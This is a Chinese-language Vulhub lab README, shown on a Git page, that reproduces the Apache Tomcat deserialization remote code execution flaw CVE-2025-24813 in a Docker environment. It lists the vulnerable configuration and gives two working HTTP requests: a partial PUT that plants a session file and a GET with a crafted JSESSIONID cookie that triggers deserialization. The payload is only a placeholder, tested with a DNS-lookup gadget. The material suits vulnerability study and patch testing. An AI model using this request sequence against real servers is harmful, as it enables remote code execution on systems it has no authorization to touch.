aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
63285f61aaf4501a6660be7dfe98c70135c1b89b
vulhub/tomcat/CVE-2025-24813/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

88 lines
2.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Tomcat 远程代码执行漏洞CVE-2025-24813
Apache Tomcat 是一个广泛使用的开源Java Servlet、JavaServer Pages、Java Expression Language和WebSocket技术的实现。
在 Tomcat 版本 9.x ~ 9.0.9710.x ~ 10.1.34, 11.x ~ 11.0.2 中,当 Tomcat 同时配置了可写的 DefaultServletreadonly=false和基于文件的会话持久化时攻击者可以向服务器写入任意文件并通过操作 JSESSIONID cookie 触发这些文件的反序列化,最终导致远程代码执行。
- <https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq>
- <https://github.com/charis3306/CVE-2025-24813>
- <https://forum.butian.net/article/674>
## 环境搭建
执行以下命令启动存在漏洞的Tomcat 9.0.97服务器:
```
docker compose build
docker compose up -d
```
服务启动后,访问`http://your-ip:8080`即可看到Tomcat的示例页面。
## 漏洞复现
该漏洞存在的原因是Tomcat中两个关键的错误配置。首先DefaultServlet配置了readonly=false允许文件上传
```xml
<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
```
其次Tomcat配置了基于文件的Session持久化
```xml
<Manager className="org.apache.catalina.session.PersistentManager">
<Store className="org.apache.catalina.session.FileStore"/>
</Manager>
```
这两种配置都使用相同的默认存储路径:`$CATALINA_BASE/work/Catalina/localhost/ROOT`
当发送不完全的PUT请求使用`Content-Range`Tomcat会将文件路径中的分隔符(/)转换为句点(.),并将文件临时存储在会话存储目录中。利用这个特效,我们可以将恶意序列化对象写入此临时文件中。
要利用此漏洞首先发送带有Content-Range头的部分PUT请求在临时目录中写入名为.deserialize.session的文件这里使用URLDNS gadget进行测试
```
PUT /deserialize/session HTTP/1.1
Host: your-ip:8080
Content-Length: 1234
Content-Range: bytes 0-5/10
deserialize content
```
![](1.png)
然后发送另一个带有操作过的JSESSIONID cookie的请求触发文件的反序列化
```
GET / HTTP/1.1
Host: your-ip:8080
Cookie: JSESSIONID=.deserialize
```
![](2.png)
可见URLDNS gadget被成功反序列化并发送了DNS请求
![](3.png)
在实际攻击场景中,"deserialize content"将被替换为恶意的序列化Java对象当被目标应用反序列化时可以执行任意代码。
Reference in New Issue View Git Blame Copy Permalink